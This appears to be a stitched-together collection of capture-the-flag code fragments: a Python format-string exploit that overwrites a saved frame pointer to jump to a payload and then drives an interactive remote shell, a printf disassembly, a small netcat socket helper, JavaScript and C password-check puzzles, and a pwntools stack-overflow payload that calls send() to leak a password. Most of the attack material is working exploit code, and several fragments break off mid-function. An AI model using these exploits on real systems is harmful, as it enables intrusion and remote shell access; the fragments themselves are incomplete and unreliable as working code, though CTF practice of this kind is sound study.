| # Step 3 --- Exploit: trigger the payload so we get a nice shell | |
| # minus 4 because leave does "mov %ebp, %esp" and then "pop %ebp" | |
| target_ebp_value = location_payload - 4 | |
| ebp_ho_count = ((target_ebp_value >> 16) % 0x10000) | |
| ebp_lo_count = (target_ebp_value % 0x10000) | |
| EXPLOIT = dword_to_bitstring(location_ebp_printf + 2) | |
| EXPLOIT += dword_to_bitstring(location_ebp_printf) | |
| if ebp_ho_count < ebp_lo_count: |
| # Step 4 --- Test whether we've got our shell and let the magic happen | |
| nc.write("echo \"GOT A SHELL\"\n") | |
| nc.read_until("GOT A SHELL\n") | |
| print "\nSUCCESS! We have a shell!\n" | |
| while True: | |
| command = raw_input("$ ") | |
| nc.write(command + "\n") | |
| # quick and dirty way to detect end of output |
| ; Dump of assembler code for function printf: | |
| push %ebp ; save old frame pointer | |
| mov %esp,%ebp | |
| push %ebx | |
| call 0xb7e8ba0f | |
| add $0x10dd5b,%ebx | |
| sub $0xc,%esp | |
| lea 0xc(%ebp),%eax | |
| mov %eax,0x8(%esp) | |
| mov 0x8(%ebp),%eax |
| call 0x80486d0 <printf@plt> | |
| movl $0x8049f3a,(%esp) | |
| call 0x8048750 <puts@plt> | |
| mov -0xc(%ebp),%eax | |
| leave ; equivalent to movl %ebp, %esp | |
| ; popl %ebp | |
| ret |
| # -------------- netcatlib.py ----------------------------------- | |
| import socket | |
| class Netcat: | |
| # TODO: ip and port should be optional, and an open() method should be added | |
| # TODO: specify a timeout argument as well? | |
| def __init__(self, ip, port): | |
| # Receive buffer, empty until data arrives; presumably holds bytes read from the socket but not yet consumed by the reader methods -- confirm against the rest of the class. | |
| self.buff = "" | |
| # Blocking IPv4 TCP socket. No timeout is set (see TODO above), so a peer that never answers blocks later reads indefinitely. | |
| self.soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| # Connects eagerly in the constructor; socket.error propagates to the caller if the host is unreachable or refuses the connection. | |
| self.soc.connect((ip, port))
| function validate() { | |
| var x = document.forms["formxx"]["pwz"].value; | |
| alert(x); | |
| if (x == null || x == "") { | |
| alert("Password must be filled out"); | |
| return false; | |
| } | |
| if (!x.match(/^[A-Za-z]+$/)) { | |
| alert("Bad charset"); |
| function validate() { | |
| var x = document.forms["formxx"]["pwz"].value; | |
| if (!x.match(/^[A-Za-z]+$/)) | |
| return false; | |
| if (!sha1(x).match(/^ff7b948953ac/)) | |
| return false; | |
| alert("Flag: " + x); | |
| return true; |
| #include <stdio.h> | |
| #include <stdint.h> | |
| int is_correct(uint32_t seed) { | |
| uint8_t hexkey[] = "\xA4\x3D\xF6\xF3\x74"; | |
| for (uint32_t i = 0, x = seed; i < 5; ++i) { | |
| x = (214013 * x + 2531011) & 0xFFFFFF; | |
| printf("%X\n", x); | |
| if (hexkey[i] != (x >> 16)) return 0; | |
| } |
| #include <stdio.h> | |
| #include <stdint.h> | |
| int is_correct(uint32_t seed) { | |
| uint8_t hexkey[] = "\xA4\x3D\xF6\xF3\x74"; | |
| for (uint32_t i = 0, x = seed; i < 5; ++i) { | |
| x = (214013 * x + 2531011) & 0xFFFFFF; | |
| if (hexkey[i] != (x >> 16)) return 0; | |
| } | |
| return 1; |
| #!/usr/bin/env python2 | |
| from pwn import * | |
| # Stack layout of vulnerable functions: | |
| # | |
| # [ buffer of some length ][canary][align1][align2][saved-ebp][return-addr][arg0-buffer][arg4-count] | |
| # | |
| payload = pack(0x08048740) # send function -> send(socket, &password, 0x100, 0) |